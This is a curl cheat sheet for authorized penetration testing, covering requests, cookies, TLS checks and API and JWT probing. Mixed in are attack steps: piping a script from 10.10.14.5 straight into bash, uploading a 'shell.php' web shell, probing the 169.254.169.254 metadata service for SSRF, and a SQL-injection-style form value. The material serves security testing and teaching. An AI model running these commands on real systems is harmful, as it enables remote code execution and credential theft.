curl Cheat Sheet

Versatile CLI for HTTP(S), file transfer, headers, and scripting web/API tests during pentests.

Utilities & ShellsapihttptransferUpdated 2026-06-02

Overview

curl transfers data with URL syntax. Core tool for probing APIs, bypassing client restrictions, testing SSRF payloads, downloading shells, and inspecting TLS/certificate behavior.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

sudo apt install -y curl

curl --version

Essential commands

GET with headers

curl -i https://target/api/v1/users

POST JSON

curl -s -X POST https://target/login   -H 'Content-Type: application/json'

-d '{"user":"admin","pass":"test"}'

Save output

curl -o page.html https://target/

curl -O https://target/file.zip   # remote filename

Common workflows

Authentication / cookies —

curl -c cookies.txt -b cookies.txt -L https://target/dashboard

curl -u user:pass https://target/basic-auth

curl -H "Authorization: Bearer TOKEN" https://target/api

Custom verbs and headers —

curl -X PUT -H 'X-Custom: value' -d 'data' https://target/resource

curl -X OPTIONS -i https://target/

curl -H "Host: internal.local" http://10.10.10.5/

SSRF / internal probe (authorized) —

curl -s "http://169.254.169.254/latest/meta-data/"

curl -g "http://[::ffff:169.254.169.254]/"

TLS / cert inspection —

curl -vI https://target/ 2>&1 | grep -E 'subject:|issuer:|SSL'

curl --insecure https://selfsigned.local/   # lab only

Upload file (multipart) —

curl -F "file=@shell.php" -F "submit=upload" https://target/upload.php

Rate / timing —

curl -w '@-' -o /dev/null -s https://target/ <<'EOF'

time_namelookup: %{time_namelookup}\n

time_connect: %{time_connect}\n

time_total: %{time_total}\n

EOF

Flags reference

`-X METHOD`	HTTP method
`-H "Header: val"`	Request header
`-d DATA`	POST body
`-L`	Follow redirects
`-k`	Insecure TLS
`-v`	Verbose
`-s`	Silent (no progress)
`--proxy http://127.0.0.1:8080`	Burp intercept
`-A "User-Agent"`	Spoof UA

Quick one-liners

Show only the HTTP response headers

curl -sI https://target/

Print only the HTTP status code

curl -s -o /dev/null -w '%{http_code}\n' https://target/

Send a raw cookie header

curl -b 'session=eyJ...; role=admin' https://target/dashboard

Route all traffic through Burp/ZAP for inspection

curl -x http://127.0.0.1:8080 -k https://target/

Download and pipe a script straight to bash (lab only)

curl -s http://10.10.14.5/x.sh | bash

Follow redirects but cap them (avoid loops)

curl -L --max-redirs 5 https://target/

Resolve a host to a chosen IP (vhost / split-horizon tests)

curl --resolve target.local:443:10.10.10.5 https://target.local/

Send a urlencoded form body

curl --data-urlencode 'q=admin'\''--' https://target/search

Auth & API testing

Bearer token request to a JSON API

curl -s -H 'Authorization: Bearer TOKEN' https://target/api/v1/me | jq .

Basic auth

curl -u admin:password https://target/admin

Replay a JWT and decode the payload

curl -s -H "Authorization: Bearer $JWT" https://target/api | jq .

GraphQL introspection query

curl -s -X POST https://target/graphql -H 'Content-Type: application/json' -d '{"query":"{__schema{types{name}}}"}'

Test an HTTP method override (verb tampering)

curl -X POST -H 'X-HTTP-Method-Override: PUT' https://target/resource

Tips

Use --path-as-is to prevent curl normalizing ../ in paths (cache poisoning tests).
curl --compressed requests gzip/br decoding.
Pipe to jq for JSON APIs: curl -s URL | jq .
Prefer Burp Repeater for complex sessions; curl for automation and CI.